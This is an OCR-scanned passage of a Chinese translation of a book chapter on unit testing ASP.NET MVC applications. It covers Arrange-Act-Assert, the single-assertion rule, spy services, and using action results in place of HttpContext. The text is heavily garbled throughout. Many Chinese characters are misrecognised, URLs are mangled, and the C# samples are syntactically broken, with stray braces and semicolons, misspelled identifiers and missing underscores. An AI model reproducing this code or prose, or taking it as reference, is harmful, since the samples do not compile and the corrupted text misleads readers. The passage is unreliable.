写 为 3A)， 该 结构 由 William C. Wake 在 他 的 一 篇 博文 (http:/weblogs.javanetblog/wwake/ 
archive/2003/12/tools_especiallhtmD 上 提出 ， 描 述 了 一 种 由 三 部 分 组 成 的 单元 测试 结构 : 

e Arrange: 准备 测试 环境 。 

e Act: 在 测试 中 调用 的 方法 。 

e Assert: 确保 按 预 期 执行 。 

采用 3A 结构 编写 的 单元 测试 的 代码 如 下 所 示 : 

[TestMethod | 
Public void PoppingReturnsLastPushedIlItemFromSstack!() 
{ 
// Arrange 
Stack<string> stack = new Stack<string> ()} 
string Value = "Hello, World!'™} 
stack.Push (value),;} 


// Act 
string result = stack.Pop(}); 


// Assert 
Assert.AreEqual (value, result); 
} 

为 了 清楚 地 显示 测试 程序 的 结构 ， 上 面 的 代 但 中 添加 了 Arrange、Act 和 Assert 注释 。 
当然 , 在 实际 测试 程序 中 , 我 们 有 时 也 经 贡 诊 加 注释 。 首 先 ,arrange 部 分 创建 了 一 个 空 栈 ， 
并 推进 一 个 值 。 这 些 是 测试 功能 时 的 先决 条 件 。 然 后 ，act 部 分 从 栈 中 弹出 arrange 部 分 添 
加 的 值 ， 这 里 只 测试 一 行 代码 。 最 后 ，assert 部 分 测试 一 个 合乎 逻辑 的 行为 :， 从 栈 中 弹出 
的 值 和 推进 栈 中 的 值 是 一 样 的 。 如 果 要 精简 测试 代码 ， 我 们 可 以 去 掉 注 释 ， 而 改 用 才干 空 
白 行 来 分 隅 各 部 分 代 但 。 


4. 单一 断言 规则 


在 上 面 3A 形式 栈 的 示例 中 ， 确 保 栈 得 到 期 望 值 的 assert 部 分 只 有 一 行 代码 ， 难 道 没 
有 许多 其 他 可 以 断言 的 行为 吗 ? 例如 ， 一 旦 从 栈 中 弹出 推进 的 值 ， 栈 就 变 空 ， 难 道 我 们 不 
应 该 确保 它 是 空 的 吗 ? 如 果 此 时 再 尝试 弹出 另 一 个 值 ， 程 序 就 会 抛 出 异常 ， 难 道 我 们 不 也 
应 该 编写 程序 测试 吗 ? 

在 一 个 测试 中 ， 一 定 不 要 同时 测试 多 个 行为 。 一 个 好 的 单元 测试 程序 通常 只 测试 一 个 
非常 小 的 功能 ， 即 一 个 单一 行为 。 这 里 测试 的 不 是 “一 个 最 近 空 栈 的 所 有 属性 ”， 而 是 从 一 
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个 非 空 栈 中 弹出 的 已 知行 为 。 要 测试 空 栈 的 其 他 属性 ， 我 们 应 该 编写 更 多 单元 测试 ， 即 要 
验证 的 每 一 个 小 行为 都 对 应 一 个 单元 测试 。 

保持 测试 程序 精简 和 单一 集中 意味 着 当 修 改 产 品 代 码 时 我 们 只 需要 修改 很 少 的 (很 可 
能 是 一 个 ) 测 试 程序 。 这 样 反 过 来 也 使 得 破坏 的 内 容 以 及 修正 的 方法 更 容易 理解 。 如 果 把 寿 
干 个 行为 泥 到 一 个 单元 测试 (或 者 监 多 个 单元 测试 ) 中 ， 一 个 单一 行为 的 破坏 可 能 会 导致 数 
十 个 测试 程序 的 失败 ， 我 们 将 不 得 不 在 每 个 测试 程序 中 过 小 这 儿 个 行为 以 确定 出 现 故 障 的 
行为 。 

一 些 开 发 人 员 将 这 一 规则 称 为 单一 断言 规则 (single assertion rule)。 不 要 误 以 为 我 们 的 
测试 程序 只 能 调用 一 次 Assert， 其 实 ， 我 们 只 要 记得 一 次 只 测试 一 个 行为 ， 而 验证 一 个 合 
乎 还 辑 的 行为 调用 多 次 Assert 经 常 是 有 必要 的 。 


13.2 创建 单元 测试 项 目 


MS Test 单元 测试 框架 包含 在 除了 Visual Web Developer Express 2010 之 外 的 所 有 
Visual Studio 2010 的 付费 版 本 中 ; 如 果 使 用 的 是 Visual Studio 2012， 那 么 很 幸运 ， 它 的 免 
费 版 本 中 包含 了 单元 测试 ， 并 且 是 一 个 更 加 完善 的 单元 测试 。 尽 管 可 以 在 Visual Studio 中 
直接 创建 单元 测试 项 目 ， 但 是 开始 对 ASPNET MVC 应 用 程序 进行 单元 测试 需要 做 大 量 繁 
琐 的 工作 。 因 此 ，ASPNET MVC 团队 在 New Project 对 话 框 中 为 ASPNET MVC 应 用 程序 
包含 了 单元 测试 功能 ， 如 图 13-1 所 示 。 


| New ASP.NET MVC 4 Project 


Proyect Template 


Select a template Desecripticre 


| Fe - | & defuult ASP.NET MV 4 projpect with sn | = 

四 了 @. 的 @- aceount controller that uses forms 

Empty Basic I intranet authentication, \ 
| Application | 


到 1 mt 
ej] ©@jJ 
Mobile Web AP] 
Application 


Vie engine 
| Razeor = 


可 | Create a unit test project 


MvcApplicationl, Tests 


Test framewerke 
Visual Studio Unit Test "| Additional Info 
| ok || Gnca 


Test project name 
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选择 Create a unit test project 复 选 枉 , ASPNET MVC New Project Wizard 就 会 创建 一 个 
相关 的 单元 测试 项 目 ， 同 时 还 会 用 一 套 默 认 的 单元 测试 来 填充 新 创建 的 项 目 。 这 些 默 
单元 测试 可 以 帮助 新 用 户 理解 如 何 编 写 ASPNET MVC 应 用 程序 的 测试 程序 。 


第 三 方 单元 测试 框架 

ASPNET MVC New Project Wizard 对 话 框 中 的 Test Framework 组 合 框 可 用 来 选择 要 使 
用 的 单元 测试 框架 。 对 于 使 用 Visual Studio 付费 版 本 的 用 户 ， 对 话 框 中 还 会 包含 一 个 组 合 
框 ，Visual Studio Unit Test 被 设计 由 第 三 方 单元 测试 框架 提供 ; 检查 选择 的 单元 测试 ， 确 
定 它 是 否 文 持 ASPNET MVC。 


13.2.1 检查 默认 单元 测试 


默认 的 应 用 程序 模板 为 我 们 提供 了 足够 的 功能 来 开始 第 一 个 应 用 程序 。 当 创建 新 项 目 
时 ,系统 会 目 动 打开 HomeController cs 文件 。HomeController.cs 文件 中 包含 三 个 操作 方法 : 
Index、About 和 Contact。 下 面 是 Index 操作 方法 的 源 代 人 码 ; 


public ActionResult InadeX() 


{ 
ViewBag.Message = "Modify this template to jump-start 
YOUT ASP.NET MVC application.”; 


return View(); 
} 

这 是 非常 简单 的 代码 。 把 欢迎 文本 设置 到 弱 类 型 数据 中 并 发 送 给 视图 (ViewBag 对 
象 )， 然 后 返回 一 个 视图 结 末 。 如 果 想 要 简化 单元 测试 ， 那 么 这 样 做 就 可 以 了 。 在 默认 的 单 
元 测试 项 目 中 ，Index 操作 方法 只 有 一 个 测试 程序 : 

[TestMethod | 
public void Index() 
{ 


// Arrange 
HomeController controller = new HomeController(); 


1 / Act 
ViewResult resuilt = controller.Index() as ViewResult; 


// Assert 
Assert.AreEqual ("Modify this template to jump-start your 
ASP.NET MVC application."”, result .VijewBag.Message); 
} 


上 面 是 一 个 非常 好 的 单元 测试 ， 按照 3A 形式 编写 ， 由 3 行 代码 组 成 ， 并 旦 非常 容易 
理解 。 然 而 ， 尽 管 这 样 ， 该 单元 测试 程序 仍然 有 竺 完善。 虽然 mdex 操作 方法 只 有 两 行 源 
代码 ， 却 要 完成 三 项 任务 : 

e 把 欢迎 文本 设置 到 ViewBag 对 象 中 。 
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e 返回 一 个 视图 结果 。 
e 返回 的 视图 结果 使 用 默认 视图 。 
作为 初学 者 ， 我 们 可 以 看 出 该 单元 测试 实际 上 是 在 测试 这 三 个 问题 中 的 两 个 问题 ， 并 
日 其 中 还 有 一 个 潜在 的 微妙 错误 。 由 于 我 们 让 单元 测试 尽 可 能 精简 、 单 一 集中 ， 因 此 这 里 
至 少 需 要 两 个 单元 测试 ， 一 个 用 于 测试 欢迎 文本 ， 另 一 个 用 于 测试 返回 的 视图 结果 。 当 然 
编写 三 个 单元 测试 ， 也 不 为 错 。 
测试 程序 中 微妙 的 错误 出 现在 as 关键 学 的 使 用 上 。 在 C# 中 ，as 关键 字 用 来 把 值 转换 
为 给 定 的 类 型 的 值 ， 如 果 值 的 类 型 与 给 定 类 型 不 兼容 ， 就 会 返回 null。 然 而 在 单元 测试 程 
序 的 assert 部 分 ， 在 没有 检查 返回 的 视图 结果 是 否 为 空 的 情况 下 ， 测 试 程序 就 解 引 用 了 
result。 这 里 将 该 问题 标记 为 待 测试 的 第 四 个 问题 : 操作 方法 不 能 返回 null。 
转换 是 一 个 令 人 感 兴趣 的 代码 味道 (code smelDh， 也 就 是 说 我 们 觉得 代码 中 在 某 个 地 方 
存在 错误 的 暗示 。 转 换 真 是 必需 的 吗 ? 显而易见 ， 单 元 测试 程序 需要 ViewResult 类 的 一 个 
实例 才能 访问 ViewBag 属性 ; 这 部 分 没 问 题 。 但 是 我 们 可 以 对 操作 方法 的 代码 做 细微 改动 ， 
而 使 转换 成 为 不 必要 的 吗 ? 答案 是 可 以 的 ， 而 且 我 们 应 该 按 下 面 这 样 操 作 : 
public ViewResult Index () 
{ 


ViewBag.Message = "Modify this template to JjJump-start 
YOUT ASP.NET MVC application."; 
return View(); 
} 
通过 把 操作 方法 的 返回 值 由 一 般 的 ActionResult 类 型 修改 为 县 体 的 WiewResult 类 型 ， 
我 们 可 以 清楚 地 表达 代码 的 功能 : Index 操作 方法 总 是 返回 一 个 视图 。 现 在 只 对 产品 代码 
做 了 一 点 简单 的 修改 ， 我 们 就 由 测试 的 4 个 问题 减少 为 3 个 问题 。 如 果 Index 操作 方法 还 
需要 返回 除 ViewResult 之 外 的 其 他 对 象 ( 例 如 ,， 有 时 需要 人 返回 一 个 视图 有 时 需要 进行 重 定 
向 )， 那 么 我 们 还 是 不 得 不 采用 ActionResult 作为 返回 类 型 。 如 果真 是 这 样 ， 显 然 ， 我 们 还 
接 下 来 把 前 面 的 测试 程序 重 写 成 两 个 ， 如 下 所 不 : 


[TestMethod | 


public vold IndexShouldAskForDefaultView |() 
{ 


HomeController controller = new HomeController(); 
ViewResult result = controller.Index ();}; 
Assert.IsNotNull] (result).:} 
Assert.IsNull (result .ViewName)}); 


} 


[TestMethod | 
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public vold IndexShouldsetWelcomeMessageInViewBaqg |() 
{ 


HomeController controller = new HomeController(); 
ViewResult result = controller.Index();} 


Assert.AreEqual ("Modify this template to Jump-—start YOUT 
ASP.NET MVC application.”, result.ViewBag.Message);}; 
} 


测试 程序 修改 后 ， 看 起 来 好 多 了。 虽然 测 试 程 序 依然 向 单 ， 但 它 却 消 除了 影响 其 他 测试 
程序 的 微妙 错误 ， 此 外 ， 还 可 以 清楚 地 测试 操作 方法 中 的 两 个 独立 行为 。 还 有 一 点 值得 注意 
的 是 ， 我 们 也 给 了 测试 程序 更 加 详细 、 描 述 性 更 强 的 名 称 ， 可 以 用 来 在 不 但 看 测试 程序 的 
内 部 代码 的 情况 下 ， 帮 助 我 们 理解 测试 失败 的 原因 。 我 们 可 能 不 知道 名 为 mdex 的 测试 程 
序 为 什么 会 失败 ， 但 是 我 们 一 定 清 楚 地 了 解 mdexShouldSetWelcomeMessageInViewBasg 测 
试 失败 的 原因 。 

消除 单元 测试 中 的 重复 内 容 

通过 上 面 的 代码 ， 我 们 可 能 已 经 注意 到 重 写 的 两 个 新 的 单元 测试 有 代码 重 登 的 部 分 。 
如 果 是 产品 代码 ， 我 们 会 重 构 代 公 来 消除 重复 。 而 对 于 单元 测试 程序 代码 ， 我 们 可 以 这 
样 做 吗 ? 

可 以 ， 但 是 我 们 应 该 弄 清楚 何 时 以 及 如 何 消除 重复 。 大 部 分 单元 测试 框 如 允许 我 们 在 
测试 类 中 编写 每 个 测试 执行 之 前 执行 的 代码 。 这 似乎 是 消除 重复 的 理想 方法 。 例 如 ， 重 新 
编写 的 两 个 单元 测试 能 被 重 构 如 下 : 

[TestcClassl 
PubBI1IcC class IndexTests 
{ 


private HomeController controller; 
private ViewResult result; 


[TestIinitializel 
public void SetupContext (} 
{ 


controller = new HomeControllert(}); 


result = controller.Index(); 


} 


[TestMethod | 
public Vold ShouldAskForDefaultView() 
{ 
Assert.IsNotNull (resuilt)}); 
Assert.IsNull (result.ViewName); 
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[TestMethod | 

Public void ShouldSetWelcomeMessagelnViewBadqg () 

{ 

Assert.AreEqual ("Modify this template to Jump—start 
your ASP.NET MVC application.", 
result.ViewBag.Message); 
} 
} 


这 样 好 吗 ? 从 好 的 方面 来 说 ， 这 样 减少 了 代码 的 重复 ， 但 不 好 的 方面 是 ， 它 移动 了 测 
试 方法 中 的 arrange 部 分 和 act 部 分 。 移 除 设 置 代码 将 使 得 单元 测试 更 难 进行 ,特别 是 当 测 
试 类 中 包含 有 很 多 个 测试 时 。 根 据 是 以 使 测试 程序 清晰 的 名 义 保留 重 复 ， 还 是 以 维护 的 名 
义 减少 重复 这 两 种 观点 ， 开 发 人 员 被 分 成 两 个 派别 。 

如 末 打 算 以 这 种 方式 使 用 单元 测试 ， 那 么 每 个 上 下 文 (contexb 使 用 一 个 测试 类 最 好 ; 
这 里 的 上 下 文 指 的 是 共同 的 设置 代码 (common setup code)。 不 是 把 一 个 产品 代码 类 的 所 有 测 
试 归 到 一 个 测试 类 中 ， 而 是 按照 设置 代码 的 共性 归 类 测试 程序 。 可 使 用 像 EmptyStackTests 
这 样 的 名 称 的 测试 类 结束 ， 而 不 是 像 PushTests 这 样 的 测试 类 。 

答 试 将 这 种 重 构 与 “每 个 产品 类 一 个 测试 闫 ”结合 ， 可 以 有 效 地 解决 这 一 问题 。 当 回 
一 个 单一 测试 关中 添加 数 十 (或 数 日 ) 个 测试 时 ， 文 持 所 有 这 些 测试 的 必要 设置 代码 就 会 变 
得 非常 多 。 此 时 ， 我 们 就 不 能 清楚 地 知道 哪个 单元 测试 需要 哪些 行 设 置 代 码 了 。 为 了 可 维 
护 性 ， 我 们 强烈 建议 每 个 上 下 文 对 应 一 个 测试 类 。 


13.2.2 只 测试 目 己 编写 的 代码 


单元 测试 和 TDD 的 初学 者 很 容易 犯 的 一 个 错误 是 ， 他 们 经 营 有 意 无 意 地 测试 不 是 由 
目 己 编写 的 代码 。 实 际 上 ， 我 们 的 测试 应 该 集中 在 目 己 编写 的 代码 上 ， 而 不 是 它们 所 依赖 
的 代码 或 逻辑 上 。 

作为 一 个 具体 的 例子 ， 请 看 下 面 样 例 操作 方法 : 


public ActionResult About () 
{ 


return View(); 
} 
操作 方法 没有 比 这 还 人 简单 的 了 。 显 然 ， 我 们 应 该 也 能 够 为 这 段 代 人 码 编 写 一 个 比较 简单 
的 单元 测试 : 
[TestMethod | 
public void AboutSshouldAskForDefaultView |() 
{ 


HomeController controller = new HomeController(); 


ViewResult result = (ViewResult}controller.About () ; 
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Assert.IsNotNull] (result).; 
Assert.IsNull (result .ViewName); 
} 

当 调用 一 个 控制 器 操作 , 并 通过 MVC 管道 泻 染 一 个 视图 时 , 会 发 生 一 系列 事件 : MVC 
定位 操作 方法 ;然后 ， 调 用 模型 绑 定 堪 为 每 个 操作 方法 参数 绑 定 值 来 调用 这 些 操作 方法 ， 
从 操作 方法 中 取出 值 并 执行 ， 最 后 把 输出 结果 发 送 回 浏览 如 。 男 外 ， 由 于 我 们 请 求 的 是 默 
认 视 图 ， 因 此 ， 系 统 尝试 在 文件 夹 ~/Views/Home 和 ~/Views/Shared 文件 夹 中 碍 找 一 个 名 为 
Abonut 的 视图 (以 匹配 操作 名 称 )。 

这 个 单元 测试 不 涉及 任何 代码 。 单 元 测试 应 该 只 测试 要 测试 的 代码 ， 而 不 是 它 的 合作 
者 。 一 次 测试 多 个 问题 的 测试 称 为 集成 测试 (integration test)。 如 果 人 和 仔 细 想 一 下 ， 会 发 现 不 
存在 这 样 的 测试 ， 因 为 这 样 的 测试 行为 的 所 有 其 余部 分 由 ASPNET MVC 框架 本 身 提供 ， 
而 不 是 由 我 们 编写 代码 实现 。 从 单元 测试 的 角度 来 说 ， 我 们 必须 相信 : ASPNET MVC 框 
架 能 够 做 所 有 这 些 事情 。 测 试 一 起 运行 的 所 有 代码 也 是 一 个 宝贵 的 锻炼 ， 但 它 超出 了 单元 
测试 的 郊 围 。 

现在 重点 讨论 一 下 ViewResult 类 。 它 是 调用 About 操作 的 直接 结果 。 我 们 要 测试 系统 
默认 耸 找 About 视图 的 能 力 吗 ? 我 们 可 以 说 不 ， 因 为 这 不 是 我 们 目 己 编写 代码 来 实现 ， 而 
是 由 ASPNET MVC 框架 提供 ， 即 便 该 字 变 量 不 是 必 不 可 少 的 。 我 们 也 可 以 说 不 ， 尽 管 它 
是 日 己 定义 的 操作 结果 类 , 但 它 不 是 我 们 当前 要 测试 的 代码 。 目 前, 我 们 关注 About 操作 。 
其 实 ，About 操作 采用 了 一 个 具体 操作 结果 类 型 才 是 我 们 所 需要 知 着 的 ;， 其 体 它 做 的 什么 
是 该 段 代 码 的 单元 测试 所 关注 的 问题 。 事 实 上 ， 可 以 认为 ， 操 作 结 果 无 论 是 由 我 们 日 定义 
的 还 是 由 ASPNET 团队 提供 的 ， 操 作 结 果 代码 就 其 本 身 而 言 都 能 得 到 充分 的 测试 。 


13.3 ”单元 测试 用 于 ASP.NET MVC 应 用 程序 的 技巧 和 
£31] 
现在 我 们 学 习 了 的 必要 工具 ， 接 下 来 详细 介绍 ASPNET MVC 应 用 程序 中 常见 的 一 些 
单元 测试 任务 。 


13.3.1 控制 器 测试 

默认 的 单元 测试 项 目 包 含 一 些 控制 器 测试 程序 ， 这 些 默认 的 测试 程序 在 本 章 前 面 已 修 
改 完 善 。 控 制 器 测试 中 存在 有 数量 惊人 的 微妙 差异 ， 这 些 差异 通常 位 于 体面 代码 和 优质 代 
码 之 间 的 细小 不 同 处 。 

1. 控制 器 中 不 要 包含 业务 逻辑 

在 模型 -视图 -控制 器 结构 中 ， 控 制 器 主要 承担 着 模型 (包含 业务 逻辑 ) 和 视图 (包含 用 户 
界面 ) 之 间 的 协调 者 角色 ， 是 把 每 个 部 分 连接 到 一 块 儿 ， 并 使 其 运行 的 调度 程序 。 
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当 谈 论 业 务 迪 辑 时 ， 它 可 以 和 数据 或 输入 验证 一 样 何 单 ， 也 可 以 和 申请 长 期 运行 进程 
(比如 核心 业务 工作 流 ) 一 样 复杂 。 作 为 一 个 示例 ， 控 制 费 不 应 该 试图 验证 模型 是 正确 的 ， 
因为 这 是 业务 模型 层 的 任务 。 然 而 ， 当 被 告知 模型 无 效 时 ， 控 制 嚣 需要 关注 采取 什么 样 的 
操作 (可 能 当 模型 无 效 时 ， 需 要 重新 显示 一 个 特定 视图 ， 或 当 模 型 有 效 时 ， 用 户 将 被 发 送 到 
男 一 个 页 面 )。 

因为 控制 右 操 作 方 法 比较 简单 ， 历 以 相应 地 ， 操 作 方 法 的 单元 测试 也 应 该 简单 。 单 元 
测试 也 应 该 和 控制 赤 一 样 ， 把 业务 迎 辑 和 单元 测试 浊 辑 分 开 。 

为 了 更 加 详细 地 说 明 这 条 忠告 ， 下 面 考 娠 模型 和 验证 。 一 个 好 的 单元 测试 和 坏 的 单元 
测试 之 间 的 差异 是 十 分 微妙 的 。 一 个 好 的 单元 测试 会 提供 一 个 假 的 业务 逻辑 层 ， 用 来 根据 
测试 需要 来 告知 控制 费 模 型 是 否 有 效 ; 而 一 个 坏 的 单元 测试 会 把 好 的 数据 或 坏 的 数据 胡乱 
拼 恋 到 一 块 ， 由 现 有 的 业务 多 辑 层 为 控制 需 状 别 数 据 的 好 坏 。 坏 的 单元 测试 一 次 测试 两 个 
组 件 (控制 左 操 作 和 业务 层 )。 使 用 坏 的 单元 测试 的 一 个 不 太 明 显 的 问题 是 它 使 用 了 坏 的 数 
据 ; 如 果 随 看 时 间 的 推移 ， 坏 数据 的 定义 发 生 了 改变 ， 那 么 测试 也 会 变 得 不 正 弟 ， 当 运行 
测试 时 ， 可 能 会 导致 假 阴 性 的 结 采 (或 更 糟 的 是 ， 假 阳性 )。 


想 要 编写 良好 的 单元 测试 还 要 求 控 制 器 设计 中 的 一 些 准则 ， 这 也 是 提出 下 面 第 二 条 忠 
告 的 直接 原因 。 


2. 通过 构造 函数 传递 服务 依赖 


为 了 编写 刚才 讨论 的 好 单元 测试 ， 我 们 宕 要 提供 一 个 假 的 业务 迪 辑 层 。 如 果 控 制 顷 直 
接 绑 定 到 业务 层 ， 这 将 会 是 相当 大 的 挑战 。 而 如 果 通 过 构造 函数 把 业务 层 看 成 一 个 服务 参 
数 ， 这 样 束 会 使 我 们 提供 假 业 务 层 变 得 很 便 单 。 

这 里 正 是 12 章 忠告 的 用 武之 地 。ASPNET MVC 3 引入 了 一 些 简单 方法 来 实现 应 用 程 
序 中 的 依赖 注入 ， 从 而 使 得 通过 构造 函数 参数 获得 服务 的 理念 成 为 可 能 ， 可 喜 的 是 这 一 过 
程 非常 简单 。 我 们 现在 可 以 在 单元 测试 中 轻松 地 利用 这 些 成 果 来 帮助 实现 隔离 测试 (单元 测 
试 的 三 个 关键 方面 之 一 )。 

为 了 测试 这 些 服 务 依赖 ， 要 求 服务 是 可 替换 的 。 也 就 是 说 ， 我 们 需要 用 接口 或 抽象 基 
类 来 表示 服务 。 为 单元 测试 编写 的 假 替 代 层 可 以 手动 编写 代 人 码 实 现 ， 或 者 使 用 模拟 框架 来 
向 化 实现 。 甚 至 可 使 用 称 为 目 动 模 拟 容 器 (auto-mocking containers) 的 特殊 种 类 的 依赖 注入 
容 句 来 帮助 目 动 创 建 。 

手动 编写 假 服务 的 一 个 币 见 方法 是 间 读 (py)， 它 只 是 记录 传递 的 仁 ， 以 便 单 元 测试 后 
期 检查 。 例 如 ， 假 如 我 们 有 一 个 Math 服务 (一 个 简单 例子 )， 带 有 如 下 接口 : 

public interface IMathService 


{ 
int Addl{(int left, int right)}); 
} 


上 述 代 人 码 中 使 用 的 方法 的 参数 需要 两 个 值 ， 返 回 一 个 值 。 显而易见 ，Math 服务 的 真实 
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实现 是 求 两 个 值 的 和 。 间 谍 实 现 可 能 如 下 : 


public class SpyMathService : IMathService 
{ 

public int Add Left; 

public int Add Right; 

public int Add Result; 


public int Addl(int left, int right) 


{ 
Add Left = left; 
Add Right = right; 
return Add Result; 
} 


} 
现在 单元 测试 可 以 创建 该 间谍 的 一 个 实例 , 当 调用 Add 时 ,用 传 回来 的 值 设置 Add_Result， 
在 测试 完毕 后 ， 可 断言 Add_Left 和 Add Right 的 值 以 确保 进行 了 正确 交互 。 注 意 间谍 在 这 
里 没有 对 两 个 值 求 和 ， 因 为 我 们 只 关注 进出 数学 服务 的 值 : 


[TestMethod| 

public void ControllerUsesMathService() 

{ 
Var Service = new SpyMathservice 1{ Add Result = 42; | 
Var controller = new AdditionController(service); 


Var result = controller.Calculate(4, 12).， 


Assert.AreEqual (service.Add Result, result.ViewBag.TotalCount); 
Assert .AreEqual (4, service.Add Left); 
Assert .AreEqual (12, service.Add Right); 

} 


3. 对 HttpContext 操纵 采用 操作 结果 


ASPNET 核心 基础 结构 主要 由 IHttpModule 和 IHttpHandler 接口 ,以 及 HttpRequest 和 
HttpResponse 等 类 的 HttpContext 层次 结构 组 成 。 这 些 也 是 所 有 ASPNET 构建 的 基础 类 ， 
无 论 是 Web Forms、MVC 还 是 Web Pages 都 是 在 其 上 构建 。 

但 是 ， 从 测试 角度 来 看 ， 这 些 类 并 不 友好 。 由 于 没有 办 法 蔡 换 其 功能 ， 因 此 使 得 测试 与 
它们 之 间 的 任何 交互 都 非常 困难 (尽管 不 是 不 可 能 )。.NET 3.5 SP1 中 引入 了 一 个 称 为 
System.Web.Abstractions.dll 的 程序 集 ， 其 中 创建 了 这 些 类 的 抽象 版 本 (HttpContextBase 是 
HttpContext 的 抽象 版 本 )。ASPNET MVC 中 的 所 有 程序 都 是 用 这 些 抽象 类 而 不 是 通过 它们 
原始 的 对 应 类 编写 的 ， 从 而 使 得 与 这 些 类 的 交互 代码 的 测试 变 得 简单 。 

但 是 即便 这 样 也 不 完美 。 这 些 类 仍 有 非常 深 的 层次 结构 ， 而 且 其 中 的 大 多 数 类 还 有 数 
十 个 属性 和 方法 。 这 些 类 提供 的 间谍 版 本 非常 乏味 而 且 易 于 出 错 ， 因 此 ， 大 部 分 开发 人 员 
采用 模拟 框架 来 简化 这 项 工作 。 即 便 如 此 ， 重 复 地 设置 模拟 框架 仍然 单调 乏味 。 因 为 控制 
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峰 测 试 量 非 币 大 ， 押 以 我 们 应 该 尽量 减少 编写 测试 所 市 来 的 痛苦 。 
考虑 ASPNET MVC 中 的 RedirectResult 类 ， 它 的 实现 非常 简单 ， 只 是 调用 了 方法 
HttpContextBase.Response.Redirect。 为 什么 开发 团队 费 尽 心思 的 创建 这 个 类 呢 ? 当 我 们 把 
- 行 代码 换 成 另 一 行 更 简单 的 代码 时 ， 答 案 束 浮 出 水 面 了 : 使 单元 测试 更 加 容易 。 
为 了 清楚 地 说 明 问 题 , 下 面 编写 一 个 假想 的 操作 方法 , 用 来 重 定 向 到 网 站 的 另 一 部 分 : 


public void SendMesomewhereElse() 
| 

Response.Redirect ("~/Some/Other/Place™"),; 
} 


上 和 面 的 操作 方法 非常 容易 理解 , 但 它 的 测试 程序 没有 我 们 想象 的 简单 。 使 用 Mog 模拟 
框架 (下 载 网 址 为 http:Wcode.google.comypmoq/m 编 写 的 单元 测试 如 下 : 


[TestMethod | 
public vold SendMeSomewhereElselssuesRedirect (1) 
{ 
Var mockContext = new Mock<ControllerContext> () ， 


mockContext.Setupl(c => 

c.HttpContext.Response.Redirect ("~/Some/oOther/Place")); 
Var Controller = new HomeController (); 
controller.CcontrollerContext = mockContext .Object; 


controller.SendMeSomewhereElse(); 


mockContext .Verify(); 
} 


这 是 一 些 丑 陋 的 代码 ， 即 便 知 着 如 何 编写 也 是 如 此 ! 重 定 同 儿 乎 是 我 们 所 能 做 的 最 简 
单 的 事情 。 如 果 每 次 为 操作 编写 测试 程序 时 都 不 得 不 编写 这 样 的 代码 ， 将 是 非常 痛 闫 的 一 
件 事 。 因 为 必要 的 间谍 类 的 源 程 序 清单 会 占据 好 几 页 ， 所 以 从 测试 角度 来 看 ，Mod 非 钊 接 
近 理 想 情 况 。 然 而 ， 尽 管 小 的 改变 对 控制 器 的 可 读 性 没有 多 大 影响 ， 但 却 可 以 大 大 提高 单 
元 测试 程序 的 可 读 性 ， 如 下 所 示 : 

public RedirectResult SendMeSomewhereElse() 
{ 


return Redirect ("~/Some/Other/Place™.); 
} 
[TestMethod | 
public void SendMeSsomewhereElselssuesRedirect () 
{ 
Var controller = new HomeController(); 


Var result = controller.SendMeSomewhereElse(),;} 


Assert.AreEqual ("~/Some/Other/Place", result.Ur]l).; 
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当 使 用 HttpContext 和 友 元 把 交互 内 容 封 装 到 操作 结果 中 时 , 我们 就 把 测试 的 负担 转移 
到 了 一 个 隔离 的 地 方 。 所 有 控制 句 都 可 以 拥有 可 读 性 强 的 测试 程序 。 同 样 重要 的 是 ， 如 果 
再 要 修改 包 辑 ， 我 们 只 再 在 一 个 地 方 修改 并 且 只 再 要 改变 少量 测试 ， 而 不 再 要 修改 数 十 其 
全 数 日 个 控制 需 测 试 。 


4. 对 UpdateModel 使 用 操作 参数 


ASPNET MVC 中 的 模型 绑 定 系统 负责 将 请 求 数据 转换 成 操作 可 使 用 的 值 。 请 求 数据 
可 能 来 目 提 交 的 表单 ,也 可 能 来 目 合 询 字 符 串 值 ， 甚 至 可 能 来 日 URL 路 径 的 部 分 内 容 。 无 
论 请 求 数 据 来 日 哪里 ， 在 控制 融 中 通常 部 使 用 两 种 方式 来 获取 : 作为 一 个 操作 参数 获取 ， 
通过 调用 UpdateModel( 或 者 TryUpdateModel， 只 是 拼写 稍微 长 点 ) 获 取 。 

下 向 的 操作 方法 的 例子 便 是 采用 这 两 种 方式 获取 请 求 数据 : 

[HttpPostl]| 
public ActionResult Edit (int id) 
Person person = new Person (); 
UpdateModel (person);}; 
[...other code left out or clarity...| 
} 

参数 id 和 变量 person 使 用 了 上 面 提 到 的 两 种 方式 来 获取 请 求 数据 。 使 用 操作 参数 获取 
请 求 数据 为 单元 测试 市 来 的 好 处 是 显而易见 的 , 这 样 可 以 很 容易 地 为 单元 测试 提供 操作 方法 
需要 的 任何 类 型 的 实例 ， 而 没 必要 改变 任何 基础 结构 。 另 一 方面 ,UpdateModel 是 Controller 
基 类 的 一 个 非 虚拟 方法 ， 这 意味 看 不 能 轻易 地 窗 新 它 的 行为 。 

如 果真 需要 更 新 UpdateModel， 我 们 有 几 个 策略 可 以 把 数据 传 入 模型 绑 定 系统 。 最 明 
显 的 一 个 策略 便 是 重 写 ControllerContext(F 如 前 面 所 介绍 的 )， 并 为 模型 绑 定 器 提供 假 的 表 
单数 据 。Controller 类 也 可 以 同 模 型 绑 定 堪 提 供 能 够 用 来 提供 假 数 据 的 与 /或 值 提供 妖 。 从 
我 们 模拟 的 探索 中 ， 可 以 很 清楚 地 知道 这 些 选项 是 我 们 最 后 的 选择 。 


5. 利用 操作 过 滤器 实现 正 交 


这 条 忠告 类 似 于 操作 结果 那 条 忠告 。 它 的 核心 推荐 是 把 测试 难度 大 的 代码 隔离 到 一 个 
可 重用 的 单元 中 ， 从 而 把 困难 的 测试 与 可 重用 单元 绑 在 了 一 块 ， 而 不 会 波及 整个 控制 吉 
训 试 。 

不 过 ， 这 也 不 是 说 没有 了 单元 测试 的 负担 。 不 像 操 作 结果 情形 那样 ， 我 们 没有 任何 可 
以 直接 检查 的 输入 或 输出 。 一 个 操作 过 小费 通常 应 用 于 一 个 操作 方法 或 一 个 控制 器 类 。 为 
了 能 够 进行 单元 测试 ， 我 们 只 需 确 保 该 特性 是 存在 的 ， 而 把 实际 功能 的 测试 留 给 其 他 人 来 
做 。 单 元 测试 可 以 使 用 一 些 简 单 的 反射 来 查找 并 且 确 认 特 性 (和 一 些 需 要 检查 的 重要 参数 ) 
的 存在 。 

还 有 一 个 重要 方面 是 : 当 单 元 测试 调用 操作 时 ， 操 作 过 滤器 并 不 运行 。 操 作 过 滤器 
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所 以 能 够 在 一 个 标准 的 ASPNET MVC 应 用 程序 中 运行 ， 是 因为 ASPNET MVC 框架 本 入 
